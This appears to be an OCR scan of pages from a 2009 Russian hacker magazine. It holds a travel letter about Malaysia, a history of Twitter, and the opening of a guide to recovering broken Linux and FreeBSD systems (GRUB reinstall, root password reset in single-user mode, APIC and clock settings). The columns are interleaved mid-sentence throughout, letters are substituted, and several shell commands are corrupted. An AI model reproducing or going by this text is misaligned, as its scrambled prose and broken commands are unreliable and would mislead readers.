пригласить стыдно. Аеще называется «хороший

продолжение, Знакомство ~ это одно, а ни к чему

цивилизации

отель», где на второй день половые стащили

не обязывающая беседа - совсемдругое.

се~час ограбят, убьют, изнасилуют. Так ведь

свое же собственное покрывало L1 пришлось

нет ' Не ограБИЛL1, не убили, не юнасило­

долго разбираться с менеджером, на хвоста они

это вовсе незначит, что знакомство получит

ОГРАБЯТ, УБЬЮТ, ИЗНАСИЛУЮТ

И все время думал

ну вот,

вали. Малайзия в зтом плане интересная

Хотя, скорее всего, это

это сделали. У нас в отелях, конечно, тоже воруют,

страна. За наРКОТL1КИ приговаривают к смер­

но воруют осмысленно и по понятиям

Вообще говоря, люди здесь удивительно дру­

тной казни, но все какбы в теме, L1 у всех есть

Зато у них можно спокойно посидеть с де­

желюбные, привыкли улыбаться и общаться.

«very speclal stuff, поt а drug» И вот CL1AL1M

вушко~ В очень дорогом ресторане за ее счет.

ХАКЕР ОЬ

'1261 09

~

075

thPqJJ

:fl:-"=# ..... .~.. о

LJ

О

1]

сцен.:.

о о

\I :~

~e? о

о

:fp f,~e~, С.I О

о

r.:

~

'~"' о

;J

Мыщъх сидел с тремя, причем две из них замужем Одна из Америки, остальн ые

- змигрантка

- коренные израильтянки Все образованные

Атаки следую]' непрерывно,так что лучшего места для тестирования систем обнаруженияи предотвращениявторжений, пожалуй, не найти,

и начитанные, умные до невозможности, И ВОТ сидим мы, Значит, В рес­

Не могу умол чать О том, ЧТО в октябре п рошлого года здесь про води­

торане под открытым небом На улице уже зима, ночь Слегка прохлад­

лась конференция HITB [Hack In The Вох), посвященная различным

но, но еще не холодно, Мимо нас идут ЛЮДи, а мы пьем пиво [ну, это она

аспекта,~ инфор,~ационнойбезопасности На ней я представил

пьет пиво, а мыщьх -

доклад о найденных мной недоработках в процессорах Iпtеl, которые

вишневый сок) и обсуждаем OpenBSD, ламповые

усилители HiFI-класса, критикуя беспроводные колонки и прочую

позволяют использовать уязвимости как непосредственноСИДЯ за

потребительскую муть, Оказываеl'СЯ, у нее трое детей, она ученый и

компом, так и удаленно, вне зависимости от операционной систе­

большой меломан, Ассемблер

- это так, невинное хобби

мы, установленных обновлений и приложений, Но зто уже тема для отдельной статьи ..

~ '1

АТАКИ СЛЕДУЮТ

НЕПРЕРЫВНО

P.s.

Что касается хакеров, то G Малайзии они тоже наличествуют, причем

Frою:

практически всеза,шкаются на сетевой безопасности,дизассембли­

То:

рованием здесь никто не занимается

Subj ее t: Re (16] :

-

на Н IEW смотрят с удивлением,

Kris Kaspersky

[email protected] статьи в следующий номер

а ИДУ зна ют на уров не новорожденной м ыш и, Зато в сетях шарят чисто

'\ \

конкретно, но в основном

-

в сторону взлома, а не воздвижения Тут

Доброго времени суток!

даже в столице интернеттормозитта к, как не тормозиту меня дома в

деревне Есть куча ,~ecт с бесплатным

\NI-Fi, что существенно упрощает

Только что вернулся из Малайзии, Устал жутко Долетели на честном

сетевые атаки и обкатку новых технологий взлома и защиты ОТ нападе­

слове и одном крыле, Один сегмент крыла отсутствовал ;-( ахренеть,

ния,

Никогда бы не поверил, если бы не видел это сВоими глазами, Х

.076

\

1~'m_1 Игры меняются, :1.01 JIdипiI!IlUJ

gamelandIu остается!

История

Тwitt@гевеРХ-ПОПУЛS1рен на ЗапаДе и стремительно набмрает оБОРQТЫ в других

странах

-

на него постоянно ссылаютсS1 в СМ И, twittег-сзккаУНТbI ест!;;> у многих

знаменитостей, и даже президеНi США Барак 06ама ведеТТ;dМ свой блог.

На ПQ·ка оДни называютТwittег гениальным изобретением, друrие вместо ин~

новаций !;3идят лишь грамотную рекламу и стадные инстинкты. Кто же прав?

,\ \

в ЦЕЛОМ, нужно признать, ничего ин­

ИЗОБРЕТАЕМКОЛЕСО

LlveJournal был совсе'! молод - регистрация

новационного и ранее невиданного Twittec

ПРИДУ'lализагадочнуюпомесь блага с 1М [iпstапt

осущеСТ8лялась по пригла шениям, и Дорси

действительноне несет. Явлению "сетевого

messenger) в 2006 годутри '10ЛОДЫХ IT -шника:Джек

получил в системе номер

дневника» CaMO'lY по себе никак не '1еньше

Дорси (Jack Dorseyi, БиэСтоун [Biz Stonel и Эван

что до нынешней популярности сервисубыло еще далеко, Джеку ЖЖ понравился, а вскоре и вовсе

4,136. Нес'lОТРЯ нато,

15 лет, а если копнуть поглубже, так и вовсе

Уильямс IEvan WilLlams] Но хотя создание сервиса

выясняется, что даже в до-httр-шный период,

и является бесспорной заслугой всехтроих, ориги­

натолкнул молодого програ'lмиста на '1ысль.

еще во

нальная идея, всеже, принадлежала ДжекуДорси,

Дорси понял, что ЖИВОЙЖУРI'lал можно сделать

Bpe'leHa Usепеt, существовали

vi ДЛ51ЗТОГО

подобия COBpe'leHHbIX блогов Специализи­

позтомуо не'! я расскажу чуть подробнее.

еще более "живым».

рованные сервисы для ведения онлайновых

Дорси - программистЗ2лет от роду, увлечен­

добавить ВОЗ'lожность публиковать свой те кущий

дневн иков тоже появились далеко не вчера

ный высокими технологиями практически с

ста1УС в режиме реального вре'lени. Стоит сказать,

Например, столь популярная в рунете плат­

самогодетства. Еще в 140Н плотно заинтере­

чтотакая опция как «ста1УС» сейчас ПрИСУТС1'вует

форма для блоггинга -

совался логисти кой пересылок и переsозок, а

практически во всех инстант мессенджерах, но

Журнал! недавно отметила свое десятилетие.

точнее, программной стороной зто го нелегкого

тогдаДорси подсмотрел ее BAIM [АОLlпstапt

Схожие факты и цифры можно привести

дела Плоды его увлечения пожинают до сих

Messengerl, которым активно пользовался')

на тему инстант мессенджеров. Не стоит

пор - open sorce ПО, написанное ЮНЫ'l Джеком,

Однакодо воплощения идеи вжизньдело не

забывать и о том, какое количество людей

используют многие компании, предоставляю­

дошло 3адумка отправилась вдолгий ящик

по всему миру регулярно зависает в раз­

щие услуги такси. К 2000-му году, добившись

- Джек был захвачен работой наддруги'lИ

личных социальных сетях [у нас зто, чаще

определенных успехов, Дорси устал "работать

проектами, ни один из которых так и не ПРИI'lес

всего, «Одноклассники» И «ВКонтакте», а за

на дядю» и перебрался из родного Миссури в

ощутимого результата. В итоге, о своей идее он

океаном - MySpase и Facebookl. Последние,

Калифорн и ю. На но вом месте он орган изо вал

снова вспомнил только в 20051'ОДУ, уже будучи

кстати, могут по хвастаться куда больши'l

собственную небольшую компанию, оказываю­

работником подкастинговой компании

количествомфишек и наворотов, чем

щую курьерские услуги, услуги перевозки пас­

LlvеJоuгпаl!Живой­

TWltter.

нужно лишь

Odeo Inc

ДО СТРАННОГО ПРОСТО

Так откуда же, спрашивается, берется такой

сажи ров, а та к же доступ к зкстрен ны '1 служба '1

ажиотаж, когда средств КО'lмуникации S Сети

через Сеть

и без того в избытке? Чтобы ответить на этот

продолжил бы работать в этой сфере, если бы в

сервисах, ориентированных на текстовые со­

вопрос, стоит обратиться к истории сервиса.

том же 2000-м не завел аккаунт в ЖЖ.

общения

~

078

vi

кто знает, возможно, Джек так и

в Odeo Дорси привела заинтересованность в

- та '1 к ним тогда тоже проявляли оп­

1 ! i

Небольшой список

ределенный интерес. Компани~ переживала не

которых получается слово. Но в ходе обсуждений

лучшие времена. В видусерьезной конкуренции

всплыло словечко Тwttг [от искаженного англ.

на рынке [тягатьс~ с тем же

«twittep> -

iTunes явно не пред­

не обошлось беэ влияния

известных

идеи, проекты и. фактически, смена профиля. И

жилось [к тому же. короткие

в ходе очередного мозгового штурма, направ­

как правило, п~ти символьныеl. Но по оконча­

и родных сердцу

ленного на спасение положени~. Дорси иэложил

нии тестирования открытие сервиса состо~лось

любого гика лич­

коллега м СВОЙ за мысел

-

создать некий сервис.

который позволил бы люд~м всегда быть в курсе,

-

домен Twitter.

горэздо более прозаическая сот уже был кем-то занят.

в этот лайфстр им было максимально просты м

Тем временем. дела у Odeo шли совсем плохо.

можно почитать

и быстрым. поэтому делал большой упор на

Уже и безтого поредевший штаткомпаниито и

мобильныетелефоны и короткиетекстовые со­

дело приходилось снова сокращать. О новоис­

общения. Именно позтому в будущем у Twi tteг и

печенном

-

длина

Twitter никто пока

не знал. и команда

работала. фактически, на голом энтузиазме. И

ДжорджЛукас (режиссер, создатель

одного SMS с за пасом дл~ н и ка.

"Звездных Войн,,):

Коллегам идея Джека пришлась подуше На со­

наконец. смогли "выйти из тени» и начали ак­

l1ttp:! /t1Nitter.com/George_Lucas

здание прототипа сервиса у Дорси и Биза Стоу­

тивно приглашатьтуда друэеЙ. всеми средства­

XOT~ сервис и запустили в работу, адевелоперы.

на, который ранее работал стакими известными

ми агитируя их пользоваться

Нил Гейман (писатель-фантаст, сце­

площадками для блоггинга как

было. Большая часть юзеров просто баловалась

нарист, автор комиксов и графических

ушло порядка двух недель. Когда рабочую мо­

SМS-ками. не со всем пон имая. зачем и кому все

романов):

дель продемонстрировали остальной команде,

это можетбыть нужно.

http://t1Nitter.com/neilhimself

Xanga и Blogger,

TWltter, успеха

Уильям Гибсон (писатель-фантаст,

очень простым. но на удивление законченным.

ПЕРВЫЙ ИНВЕСТОР

«папа» киберпанка):

Все туг же взялись за тести рование разработ­

П ару месяцев спустя ситуа ция не особенно

httр://t1Nittег.соm/GгеatDismаl

не

ки. по сути. подняв ТWlttегв закрытом режиме.

изменилась.Разве что, были "докупленыдве

«только для своих». Пользователей насчитыва­

согласные»доменного имени - адрес Тwittег.

50 человек. -

Limor Fried АКА Lady Ada (хакер,

лось не более

приверженецОреп Sошсе Hal'dware):

атмосфера секретности

и над прое кто м витала предпочитали не при­

сот перешел в распоряжение

Odeo. и Twtt, Twitter_

пережил ребрендинг, превратившись В

глашатьлюдей ИЭДрУI-ИХ компаний и состороны,

«Откуда же деньги?».

давая доступ лишь избранным. По признаниям

чала инвестор у проекта был всего один

Стивен 80ЗНЯК (специалист по вычис­

самих разработчиков, это было удивительное

финансирование взялс~ известный бизнесмен

лительной технике, основатель Apple) :

время

Iшр:/ /t1Nittег.соm/stеvеwоz

нить мир. но об этом еще никто не знаетi

Тwittег легко объясним

Например, Биз Стоун вспоминает. что В первые

ним из сооснователей тонущей

Стив Джобс (СЕО и основательАрр1е

выходные тестирования у него выдалс~ ужасный

за развитием идеи с самого начала и изнутри.

[I1С.):

уикенд

]1ttp://t1Nitter.com/Ste'TeJobs

полы. и вместо отдыха намечался жуткий аврал.

«блоггер» и попул~ризацией слова «блог». Эван

lшр:/ /twittег.сош/аdаfгuit

-

-

ты чувствуешь. что собираешьс~ изме­

дома как раз шел ремонт, перестилали

-

спросишыы. Сна­

-

за

и IТ-деятель ЭванУиль~мс. ИнтересУиль~мса к

-

во-первых, он был од­

Odeo и наблюдал

Во-вторых. именно ему мы обязаны термином

И в какой-то момент. во время этой неразберихи.

некогда приложил руку к основанию компа н и и

Стивен Фрай (британский актер, писа­

подал сигнал мобильный. Посмотрев на экран

Руга

тель и драматург):

телефона. Бизузнал, что Джек. тем временем,

Позже. когда Руга LаЬsбыла продана компании

l1rrр://twirrег.соm/stерhепfгу

отдыхал в Напе. пот~гивая вино. Стоун призна­ ется, что имен но тогда он окончательно проник­

-

продол­

Labs и фактицески

создал

Bloggercom.

Google. Уильямс с головой окунулся в новый - Odeo. Нуа когда последний начал

стартарп

Кевии Роуз (создатель digg.com):

ся этой до странного простой идеей

httр://t1"1ittег.соm/kеviпгоsе

жая заниматься своими делами. можно просто

Зван оказался не против попробовать что-то

взглянуть на дисплей мобильного и узнать. че м

еще. Для nомержки

Twitter Уилья мс,

Стоун,

сейчас за няты друзья.

Дорси и еще ряд бывших сотрудников

Odeo

Кевин Смит (режиссер, актер, сцеиа­

Ьнр:/ /twitter.com/ThatKevil1Smith

ИСКАЖЕННОЕ ЩЕБЕТАНИЕ Исходно сервис планировали назватьstаt.us.

-

Джон Фавро (режиссер):

Это имя тоже придумал Дорси

http://t\vitter.com/ Jоп]аvгеаu

нравилисьдомены. из имени И окончания

080

медленно умирать. совсем не удивительно. что

основали компанию

рист, создатель "Догмы" и «[{лерков" ):

~

из-за попытки

чем сейчас эаняты их друзья И где те находятся.

восторгам не было предела: сервис выгл~дел

.;

Twttf.com не только

быть оригинальными. Была еще одна причина,

Джекхотел. чтобы добавление новых записей

появится ограничение в140 символов

~

по адресу

Flickr, но быстро при­ SMS- номера в США,

HocTeй' которых в Twitter:

'1

«щебетать»]. которое определенно

ставл~лось возможным} требовались свежие

ему всегда

ObvioU5 Согр.

ТWIТТЕR-БУМ Мало- помалу вставать на ноги сервис начал к концу2006

-

началу2007 года «Новообращен­

ХАКЕР оь 112М

09

What is Twitter?

.. Watch:5 video!

--

-------­

Please sign '" use.r nэmе

сг еmзil эС'drеss:

~.passwOf(]:

Twltter is а service (ог frienas, family, апа co-wor1<ers 10 communicate апс! slay connectea through Ihe exchange о! quick. frequent answers 10 опе simple que9Uon: What аге уои aoing?

---1

o\,J;еIЮУU~/1oOIт

...,t'Q!"fr:>f"l

)o:..
.. I - .

'i\vltt~ is сп Ц V;I!J'I 10 ~ccrritl9It1en'9!l$«app.

ifYOLlar!nl faJТ4ar\"IA1'II';"/IttC'f.

Ld c.МI ofttlose Lt:jr:gs. м.:~

\.I.y'$P.oe.lh'ISCtJl"I:::S;'II~

tll:liollousands!upi::f \"I"'tA)'CU

f:tsr

h.ta~ "Ьсщ!

t. 8Ltt Cl10t YC.II

J." e.tr.

AmuO(!..CIC<'I'I. S.rUtt'

Ms~

SI'r1lJSJ'gityollrt"~I'IoV(

fШCI'! (\IJI ~ ь.

Eric tI"шm. Allth«

с:1 Тм ~ad

T,••'tIf:~1

ТЕМУ ПТИЧЕК ные» наконец-то начали «подсаживаться» на

зались не готовы. Было подсчитано, что в 2007

работали. Голый костяк Тwittег«оброс» полез­

Twitter, как и было задумано его создателя ми.

году Twitter оставался в рабочем состоянии 98%

I1ЫМИ функциями

Появились первые симптомы широко рас­

времени, то есть набралось П04ТИ 7 полных суток

постоянными ссылками на сообщения и тому по­

пространенного сегодня заболевания - люди

просто~. В периоды dоwпtimе по адресу Iwilter.

добными необходимыми мелочами, Разумеется,

комментировали в Twitter каждый свой ша Г,

согп отображалисьразнообразныекартинки

с каждым нововведением интерес обществен­

причем в буквальномсмысле. Один из первых

на тему птиц, например,знаменитый fail whail

ности к сервису только усиливался.

твитов от разработчиков оказался n ророческим.

-

"О, зто будет вызывать привыкание» [oh this IS

вают крохотные птички. Все зто сопровождалось

падающий кит, которого в воздухе поддержи­

- чатом, R5S-трансляцией,

Наиболее значимым и заметным витком в популярюацииТwittег, пожалуй, стали прошло­

going to Ье addictivel, - написал в марте 2006

сообщением: «Слишком многотвитовl Пожалуй­

годние президентские выборы в США. После

Дo~! Саголла и оказался совершенно прав.

ста, подождите немного и попробуйте еще раз».

того как сервис стал одним ИЗ инструментов в

Камешком, породившим настоящуюлавину, стал

Сетевое сообщество, уже изрядно пристрастив­

предвыборной борьбе (многие политики завели

ежегодн ый фестиваль музыки, кино и интер­

шееся к сервису, не преминуло породить КУ4У

tWltter-аккаУНТbI), серверы только каким-то

активныхтехнологий 50uth bySouthwest. Пока

карикатур на данную тему.

4УДОМ не на4али снова падать. П и к активности при шелся непосредствен но на день выборов ­

длилось мероприятие, шепот,ДО ЗТОПDлишь робко шелестевшийо TwitterB интернете, перешел

ДЕНЬ ВЫБОРОВ

в быстро нарастающийгул.

Пол ностью избавиться оттеХНИ4еских проблем

5XSW - один из

посещаемость подскочила на рекордные 43%1

крупнейших музыкальных фестивалей в США, так

удалось только к 2008 roAy, сделав необходимые

КУПЯТ НЕ КУПЯТ

что его всегда очень красочно освеща ютв СМ И

изменения ВДlЗижке и переехав на серверы

Воттак незаметно мы добралисьдо нашихдней.

и, коне4НО, в Сети. Twitter же помогупроситьпро­

Аmаzoп 53, В целом, именно 2О08-й, стал для

Можно, конечно, еще долго сыпать цифрами и

цесс "написанияпоста в блог» до макси мума, а на

Twitter реша ющим годом. Сервис не только

переч ислять статистические рекорды Twitter, но

SXSW оказалось немало пользователей молодого

продолжилстремительныйрост, поража~

если взглянуть на картину в целом

сервиса. Твиттеряне-первопроходцы комменти­

даже собственныхсоздателей,но и вошел в

изменился за последн ий год. Появился лишь ряд

ровали шоу в режиме реального времени,уСТрОИВ

фазу активных перемен. Так, в свете растущей

приятных дополнен ий, вроде нормального по­

практически живой стриминги координировали

популярностиот Obvious Согр отдел илась

иска, который разработчики попросту выкупили

свои действия с помощью того же Twitter. В итоге,

самостоятельная компания Twitter Iпс., которую

у другой команды и прикрутили К са Йту. В штате

детище Дорси заработало на фестивале награду

возглаЕИЛДжекДорси,а Obvious в зто время

Twitter Inc. сейчас работает порядка 30 человек и,

«best blogging tool» и, что более важно, - рекламу.

поглотила ПО4ТИ не подающая признаков жизни

какни странно, они пока не стали миллионерами,

С зто го момента интерес к Tw,tter принялся расти

Odeo. Примернотогда же у Twitter появились

хоть их компанию и оценили в 250 миллионов

в геометрическойпрогрессии.

и новые инвесторы. По некоторым прогно­

долларов

Еще несколькокрупных событий 2007 года, таких

зам, стоимостьсервиса с каждым годом будет

если, коне4НО, не считать монетизациейнедав­

как MТV М usic Awards и Apple WWDC 2007, завер­

возрастатьна миллиарддолларов(правда, 1'10

нее открытиеяпонскогофилиала 'NWW. twitter.jp,

шили начатое SXSW, заставив весь мирзагово­

други м прогнозам. через нес колько лет сервис

рить о TwitterKaKo новом уникальном явлении.

не будет стоить ничего

Число пользователей стремительно росло­

ком поспешили поддержать весьма известные в

действительно послужила огромная численность

всем хотелось попробовать «эту новую штуку" В

Кремн иевой долине вен чурные фонды - Uпiоп

японского ТЕипер-сообщества, неизвестно. Да­

действии. Кделу продвижения Twitter в массы,

SquагеVепtuгеs,

вать какие-либо комментарии по поводу возмож­

помимо «сарафанногорадио» ПОДКЛЮ4ИЛИСЬ

Garage, Spark Capital, а также инвестиционная

СМИ. В результате,у сервиса началисьпробле­

компания Bezos Expeditions, принадлежащая

коллеги неторопятся.А междутем, эта проблема

мы с работоспособностью.Хоть разработчикии

Джеффу Безосу - основателю Аmаzoп.соm. А

не так уж проста, ведь многие юзеры пользуются

ожидали, что их детище в один прекрасный день

разработчики в зто время не только супоением

сторонними twittег-клиентами,минуя сайт или,

станет популярным, н О к такому безумиюока­

медитировали на цифры посещаемости, но и

вообще, «общаются» с сервисом через SMS.

ХАКЕР

06 11261 09

:IJ. Перспективный

дот­

Charles RiverVentures, Digital

-

сервис мало

Twitter до сих пор не монетиэировался,

где «все тоже самоетолько на японском и с рек­

ламой». Был ли зто пробный шар, или поводом

ной схемы получения oTTwitter денег, Дорси и его

~ 081

Говоря о деньгах, нельзя не упомянуть, что безостановочнорастущий дотком уже пыта­ лись купить. В началетекущегогода

I

Facebook

предлагал за Twitter пол миллиардадолларов,

/

неизвестно, ~o многие ана­

литики сходятся во мнении, что акции

""

cI'<5"'1'~ <.1.,3'

j/

имен~о причинам руководствоТWlttеготвергло

-

0[(;(

,1

но не деньгами, а своими акциями. По каким

зто предложение

!/

СЗJJ!Jf c~

l'

Facebook

сильно переоценены. А в последний месяц и вовсе появились слухи о том, чтотеперь

TWltter

ведет переговоры с Google, но никаких коммен­

тариев и подробностей ~e последовало. Ну а в Сети, тем временем, как грибы после

дождя, появляются твипер-клоны (кто-то, возможно, предпочтет формул и ровку «другие

сервисы для микроблоггин ra»l. Как бы там ни было, пока ни один из них не представляет

для Twitter серьез~ойугрозы - «Чири калка»

·... Н.'·

~";'1:l1

уверенно оставляет позади всех KO~KypeHTOB.

По последним данным, Twitter занимаеттретье место по популярностисреди социальн ЫХ сетей

чрезвычай~ые ситуации и рассматривать

[Facebook и MySpace все ещелидируютi, и су­

Twitter не ка к удобный инструме~т, С помощью

масшедшая цифра годового при роста пользова­

которого МОЖНО быстро и оперативнодонести

телей

информациюдо«всея интер~ета»,то картина

- 1382% сsидетельствует, что в будущем у

вырисовываетсяне столь радужная Доста­

него есть все шансы возглавить зтоттоп.

Факты и цифры

точно взглянуть на списки людей, которых

ПУСТЫШКА

актиsнее scero «фоловят» [от а~гл. foHow­

ИЛИ ГЕНИАЛЬНОЕ

«следоватьза кем-то». Фолловеры в

Twitter

ИЗОБРЕТЕНИЕ?

- аналогфрендов sЖЖ): Бритни Спирс, Опра

Об истории и становле~иисервиса уже сказано

Уинфри, Эштон Катчер [Катчер, кстати, не­

более чем достаточно, но, кажется, ответов

давно поставил рекорд и первым взял пла~ку

на поставленныев ~ачале вопросы мы так

в миллион Фолловеров), Арнольд Шварце­

и не получили. Чем же Twitler превосходит

неггер, Барак Обама, ЭЛ Гор и далее, далее,

другие средства сетевой коммуникации,откуда

далее ... ВН!-1ма~ие к Twitter сейчас во многом

взялась сумасшедшаяпопулярностьи в чем

привлекаютзнаменитости, которых здесь в

удобство и привлекательностьмикроблоrгинга?

избытке. Мы совсем ~eдaB~O писали О том, что

На самом деле, вывод напрашиваетсянеутеши­

после пришествия в Тwittегужеупомянутой

тельный -

теле8едущейОпры Уинфри, сервис струдом

похоже, сегодня модно и удобно быть

ленивым. Нет, разумеется, у медали

TWllter есть

выдержал наплыв американскихдомохозяек.

Шу'гка ли, вденьее регистрации посещае­

светлая сторона.

Короткие сообщения максимально инфор­

мость подскочила на

мативны и начисто лишены «воды» (которая

у миссис Уинфри было

24%, и уже через 2 часа

просто не умещается в 140 символов). Плюс,

Из этих цифр и другой похожей статистики

TWltter порой реагирует на события, про­

напрашивается довольно очевидный вывод

исходящие в мире, быстрее любых СМИ. и

о конти~ге~те сервиса. Само собой, интерес­

100.000 фолловеров.

помогает максимально быстро получать и

ные люди есть 8езде, и я даже составила для

сортировать практически любую информацию.

тебя небольшой список, кого стоит почитать,

Если приводить глобальные и наиболее яркие

но все же общая тенденция не слишком

примеры, то во время террористического акта

радует Читатьлайфстрим людей, которые

раздутой из ничего, vo гениальным изобре­

в Мумбаи, произошедшего в

педантично рапортуют отом, что выпили кофе,

тением. Хотя сер8ИС и строится на давно

2008 году, свиде­

тели происходящего отправляли по -·80твитов

позавтракали, сходили в магазин, посмотрели

известных и проверенных вещах, это не

в 5 секунд, докладывая обстановку, а другие в

какой-то фильм и т.п.

отменяет того факта, что он может быть

зто время помогали составлять списки убитых

вольствие. И таких едва ли не большинство.

полезен, интересе~, а главное

и раненых. Похожая ситуация сложилась и с

Вданном случае ограничение в 140знаковрабо­

оперативен. Иметь twittег-аккаунт сегодня

рейсом

-

сомнительное удо­

-

очень

тает скорее против TWltter. чем за. Ритм современ­

удобно: одно дело читать с мобильника

вершил аварийную посадку на воду реки Гуд­

ной жизни диктует свои условия, и зачастую чем

ленту друзей в ЖЖ и совсем другое

зон, в Нью-Йорке - один из очевидцев сделал

компактнее подана информация, чем проще ею

ле~ТУТWlttег. Из-за подобной доступности и

1549,

который в начале

2009

года со­

фото места катастрофы и отправил его в

- читать

поделиться. а чем быстрее она «проглатывается».

простоты микроблоги В будущем явно про­

еще до того, как на место прибыли спасатели и

тем лучше. Но все же краткость не всегда сестра

должат пользоваться популярностью (зто не

пресса. При годился Twitter и австралийским

таланта, И стиль те KC1'a а-ля

значит, что они затмят собой обычные блоги

пожарным, когда в начале 2009 горела едва

препинаний, с кучей сокращений, упрощений

и социальные сети, а затем поработят мир,

ли не вся Австралия

и едва ли не 1337'ом, уместен далеко не всегда.

ведь с появлением кино люди не перестали

население оператив~о оповещали о текущей

Тwittегже, фактически, принуждает своих юзеров

читать и ходить в театр, а после появление

обстановке в охваченных пламенем зо~ах> И

писать именнотак, ведь на счету каждый символ.

интернета не умерли печатные СМИJ. Прос­

подобных примеров наберется немало.

Подводя итог, скажу, что, пожалуй, равно

то не нужно забывать о том, что порой

Однако если не принимать во внимание

ошибочно называть

символов недостаточно Х

~

-

Twitter

с помощью сервиса

SMS - без знаков

TWltlef'

и пустышкой,

t=1!,~:

140 РЕ Л,

082

ХАКЕР

06 11261 09

·,

~.

Р:i:::я на осуществление тел:~изи:нного вещання Серия ТВ I }

bl

• .

.; ~

N!7632

от

16.0;.2003.

выдана Минпечати рф. ,­

[ОГЕНИЙ «J 1М» ЗDБНИН

/ZOBNI NIi!G"4AIL.COM/

МАСТЕР-КЛАСС ПО РЕАНИМАЦИИ НИКСОВ M1eToAbI борьбЫ

со сбоями

Linux и Free'BSD

UNIХ-подобныеоперационныесистемы устроены так, что если в них что-то ломается, то они не пытаются самовосстановиться,

а честно сообщаюто случившемся.Дальнейшая судьба операци­ онки зависитот квалификациивладельца компа: новичок сразу затеет переустановку,матерый же юниксоид спокойно загрузится

с L'iveCD, наберет в терминале несколько команд и отправит комп на перезагрузку, довольно усмехнувшись. Дизайн UNIX настолько прост и прямолинеен,что ОС можно поднять с колен, в каком бы

.

состоянии она ни находилась



Всего существуетшесть классов проблем, с

другой операционнойсистемы уже возведе­

Команда «find /boot/grub/stage1», введенная

которыми сталк!'tваютсяпользователиниксов:

на в разряд запрещенной к обсуждениюна

в ответ на приглашениеgrub, должна выдать

1. Загрузка. Затертая запись М BR, забытый

многих тематическихфорумах, попала в мно­

на зкран имя дискового раздела, содержащего

парол ь

гочисленные FAQ и глубоко сидит в печенках

каталог /boot/grub. Далее все просто:

root.

2. Оборудование.

111

Подвисания и самопроиз­

опытных пользователей. Нет в нашей стране

вольная перезагрузка ОС, паника ядра

новичка в Liпuх, который бы ни разу с ней не

root

3. Винчестеры. Затертая таблица разделов,

сталкивался. А междутем, решение очень про­

setup (fldO) qu.it

выход из строя жесткого дис ка.

стое: достаточно загрузиться слюбого Linux

4. Графическая подсистема, Неправильная

LiveCD. открыть окно терминала и набрать

настройка хогg.сопf, отсутствующий видеодрай­

заветную команду:

дисковый--раЗДGЛ

Куда реже страдаютот проблемы затертого загрузчика пользователиFreeBSD, нотакое

вер, тормоза.

5.ДраЙвера. Все, что связано с нераспознан­

$ sudo grub-install /dev/sda

ным оборудованием.

случается и в с ними. Anгоритм восстановления записи

MBR тут несколько иной:

6. Сеть. Неправильнаянастройка сетевых ин­

в большинствеС!'tтуаций зтой команды будет

терфейсов. неработающийОNS-резолвинг.

достаточнодля возвращениязагрузчика на

ногодиска FreeBSD.

Мы рассмотрим способы борьбы с каждой из

законное место. Но если вместо глубоко"ыс­

2. Выбираем пункт меню «Flxit», далее «CDROM/

зтих проблем.

ленного молчания gгuЬ-iпstаllразразитсябран­

DVD».

ныии ругательствами­ дело плохо l Придется

3. Набираем 80ткрывшейся командной строке

запустить командную

«bootOcfg -о packet adO && exit».

КОГДА ПИНГВИН ОТКАЗЫ­ ВАЕТСЯI ВЫХОДИТЬ НА СТАРТ Пробле.,а затертой записи

~

084

MBR загрузчиком

CTpOKygrub:

1. Загружаемся с первого ил и восстановител ь­

4.Жмем на системном блоке кнопку Reset.

$ sudo grub

С MBR все. Теперь поговорим о забытом пароле

ХА.КЕР 06

11<61 09

строчек, СИГfiализирующихо сБОЙfiЫХячейках Частые саМОПРОИЗВОЛЬfiыеперезагрузки

маШИfiЫ, особеfifiО во время запускатяжелых приложений или игр,

-

следствие перегрева

процессора или видеокарты. Проверь работос­ пособfiОСТЬ кулеров и, в случае fiеобходимости, эамеfiИ их. Если времени

fia

зту процедуру нет,

а работать надо, попробуй снизить частоту процессора или чипа видеокарты. Мfiогие

&xit \~is aenu (l'etul'njp~ tO.p-l'еviоus)

i'Р'.'iiНiid 'ii'ii!4*""jШ il)ЮН _ Use « П.ор.ру genel'ated 11'0Ш tbe r i)'ljt illl4.gl!

С08ременные процессоры и матеРИfiские

Stal't «п E~rgency Hologl'«pHie SЪ~ll

платы ПОЗоВоля ют изменять тактовую частоту

процессора «на лету", без перезагрузки компа. Обычно для этого предоставляется специаль­ ный интерфейс, расположенный в

fieApax

ка­

талога /sys в Linux или 8 ОДНОЙ И3 ветвей sysctl

ЗАПУСКАЕМ СПАСАТЕЛЬНУЮ КОНСОЛЬ

FREEBSD

во FгееВSD_Для манипулироваfiИЯ частотой и другими характеристиками видеопроцессора

ПРИfiЯТО использовать кроссплатформенную

явившейсястроки слово поар1С и fiажатьЪ' Для

утилитупvсlосk. Запусти ее с флагом

выдум ывать дJ1иfiны,' за путанные па рол и,

фиксации изменений OTKpblBaeM файл/ЬооtlgгuЬ/

УЗfiать текущую частоту GPU:

а потом с успехом их забывать. и как же они

grub.conf и добавляем noapic ко всем строкам,

радуются, узнав, что для восстановления па­

наЧИfiающимся со слова kегпеl. Если и это не

пользователя

root.

Ка«же юниксоидылюбят

роля достаточно вы пол

действия. А именно

-

fi ить

всего два простых

загрузиться в однополь­

зовательском режиме и удалить па роль из базы пользователей с помощью

KOMafiAbI vipw.

В Liпuх вход в однопользовательский режим

=::. пvсlосk

grub нужный пункт меню.

нажми ·е'. добавь в конец появившейся строки

-s

поможет, полностью отключаем АСРI через опцию

«acpl=off". Для FreeBSD достаТОЧfiО вишу

'2', когда

нажать кла­

Азатем СfiИЗЬ ее примерfiО на

100 МГц:

появится меfiЮ загрузчика, а затем

зафикси ровать измеfiеfiИЯ, добавив строку «hlпt.

# nvclock

-п

300

apic.Q.disabLed= 1» вlоаdеr:сопf:

ВИНТЫ ПОСЫПАЛИСЬ

осуществляется за С'1ет передачи ядру опции

siпglе Выбери в

'-s', чтобы

~

echo "hint.apic.O.disabled=l" »

Пользователисо стажем Зfiают, что диа па­

зонпроблеМ,свяэаfifiыхсиспользованием

/boot/loader.conf

слово siпglе и нажми < Еп ter>. Ядро благопо­

жесткихдисков, очеfiЬ широк и простирается

ЛУЧfiО загрузится и запустит /ы//hh от имени

ПериодическиеподвисанияопераЦИОfifiОЙ

от механическогоповрежденияв результате

суперпол ьзователя. Вы пол н и команду

системы или постоянные уходы ядра в панику

удара до случаЙfiО потертой таблицы разде­

могут свидетельствовать О том, что оператив­

лов. В некоторых из них ВИfiчестереще можно

vi pw,

сотри звездочку в поле пароля пользователя

fiая памятьдышитна ладаfi. Если подвисания

вернуть к жизни, fiO В БОЛЬШИfiстве случаев он

